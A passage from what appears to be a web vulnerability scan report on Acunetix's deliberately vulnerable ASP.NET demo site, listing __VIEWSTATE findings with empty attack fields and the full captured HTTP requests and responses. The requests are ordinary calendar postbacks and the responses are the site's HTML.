href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8153&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAyAmqKNoIZGRksLSpSN%2FzqXl2iHFFGZ1xSafuxZ8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcmpW1CAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPbQT%2BLmvFrqlKtXgATdI4%2BPxUqfM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAyAmqKNoIZGRksLSpSN/zqXl2iHFFGZ1xSafuxZ8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcmpW1CAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPbQT+LmvFrqlKtXgATdI4+PxUqfM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:White" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8169&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAZLA8NdoIZGRkduA%2FLQ5Wnxe00apmL94ZcYE8Umc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2rqqzBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPms2yZp%2FtyGnK7VeIfMwBNoVMFWQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:53 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAZLA8NdoIZGRkduA/LQ5Wnxe00apmL94ZcYE8Umc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2rqqzBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPms2yZp/tyGnK7VeIfMwBNoVMFWQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:White" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" 